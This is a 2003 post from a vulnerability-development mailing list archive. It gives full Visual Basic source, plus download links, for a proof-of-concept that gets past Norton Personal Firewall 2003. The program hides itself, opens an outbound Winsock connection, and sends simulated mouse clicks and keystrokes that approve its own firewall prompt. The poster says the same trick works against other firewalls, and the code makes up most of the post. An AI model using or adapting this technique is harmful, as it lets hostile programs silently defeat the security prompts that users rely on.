Vulnerability Development mailing list archives
Re: Bug in Norton FireWall 2003
From: Boy Bear <eyal067 () walla co il>
Date: 19 Aug 2003 10:01:42 -0000
In-Reply-To: <20030809081203.24087.qmail () www securityfocus com>
NortonEXE - http://iso.bbs.us:777/binaryvision/Norton/NortonEXE.zip NortonSRC- http://iso.bbs.us:777/binaryvision/Norton/NortonSRC.zip It is the code: Dim numNoWindows As Integer Dim CMD1 As Integer Const MOUSEEVENTF_MOVE = &H1 Const MOUSEEVENTF_LEFTDOWN = &H2 Const MOUSEEVENTF_LEFTUP = &H4 Const MOUSEEVENTF_RIGHTDOWN = &H8 Const MOUSEEVENTF_RIGHTUP = &H10 Const MOUSEEVENTF_MIDDLEDOWN = &H20 Const MOUSEEVENTF_MIDDLEUP = &H40 Const MOUSEEVENTF_WHEEL = &H800 Const MOUSEEVENTF_ABSOLUTE = &H8000 Private Type POINTAPI X As Long Y As Long End Type Private Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long Private Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Long, ByVal dX As Long, _ ByVal dY As Long, ByVal cButtons As Long, ByVal dwExtraInfo As Long) Private Points() As POINTAPI Private iCount As Long Private Const KLF_REORDER = &H8 Private Const lang_English = 67699721 Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, _ ByVal X As Long, ByVal Y As Long, ByVal CX As Long, ByVal CY As Long, ByVal wFlags As Long) As Long Private Const SW_HIDE = 0 ' sent to ShowWindow function Private Const SW_SHOW = 5 ' sent to ShowWindow function Private Const HWND_TOPMOST = -1 'sent to SetWindowPos function Private Const vbClass = "wndclass_desked_gsk" 'Visual Basic Class name Private Declare Function ActivateKeyboardLayout Lib "user32" (ByVal HKL As Long, ByVal flags As Long) As Long Private Sub Command1_Click() If Winsock2.State <> sckClosed Then Winsock2.Close Winsock2.Connect End Sub Private Sub Command2_Click() Winsock1.Listen End Sub Private Sub Form_Load() Dim lForm As Long lForm = Me.hwnd SetWindowPos lForm, HWND_TOPMOST, 0, 0, 0, 0, 1 X = Command If X = "" Then Shell (App.Path & "\" & App.EXEName & ".exe /Connect") Winsock2.Connect X = "" ElseIf X = "/Connect" Then X = "" Me.Hide Timer2.Enabled = True End If End Sub Private Sub Timer2_Timer() Dim hwnd As Long hwnd = FindWindow(vbNullString, "Norton Personal Firewall") If hwnd = 0 Then numNoWindows = numNoWindows + 1 If numNoWindows = 150 Then Timer2.Enabled = False End End If Else Call ActivateKeyboardLayout(lang_English, KLF_REORDER) X = Screen.Width * 2.7 Y = Screen.Height * 2.7 mouse_event MOUSEEVENTF_ABSOLUTE + MOUSEEVENTF_MOVE + MOUSEEVENTF_LEFTDOWN + MOUSEEVENTF_LEFTUP, Y, X, 0, 0 CMD1 = CMD1 + 1 If CMD1 = 1 Then Timer2.Interval = 300 ElseIf CMD1 = 2 Then SendKeys "{tab}" ElseIf CMD1 = 3 Then SendKeys " " ElseIf CMD1 = 4 Then SendKeys "{UP}" SendKeys "{UP}" SendKeys "{UP}" ElseIf CMD1 = 5 Then SendKeys "{ENTER}" Timer2.Enabled = False End End If End If End Sub Private Sub Winsock2_Connect() Winsock2.SendData "Msg-Box" End Sub Private Sub wHideShow(HideShow As Boolean) Dim hwnd As Long hwnd = FindWindow(vbNullString, "Norton Personal Firewall") 'if not found then.. If hwnd = 0 Then Exit Sub End If 'if not hidden - hide, else - show If HideShow Then ShowWindow hwnd, SW_SHOW Else ShowWindow hwnd, SW_SHOW End If End Sub The Bug can act on the any Firewalls that I recognize (zonealarm, BlackICE....) The full article situated here (in Hebrew): http://tankz.zext.net/binaryvision/index.php?title=bug%20in%20Norton% 20Firewall%
202003&page=modules/articles/display.php&cat=Security&file=bug%
20in%20Norton%20Firewall%202003&right=modules/articles BoyBear From BinaryVision ( http://binaryvision.tech.nu )
symantec fix the bug on FireWall and add to "HackTool" in AntiVirus
Current thread:
- Bug in Norton FireWall 2003 Boy Bear (Aug 11)
- <Possible follow-ups>
- RE: Bug in Norton FireWall 2003 Michael Wojcik (Aug 11)
- Re: Bug in Norton FireWall 2003 pr00f (Aug 12)
- RE: Bug in Norton FireWall 2003 nowak . a (Aug 11)
- RE: Bug in Norton FireWall 2003 Michael Wojcik (Aug 11)
- RE: Bug in Norton FireWall 2003 Kayne Ian (Softlab) (Aug 12)
- Re: Bug in Norton FireWall 2003 xenophi1e (Aug 12)
- Re: Bug in Norton FireWall 2003 Boy Bear (Aug 19)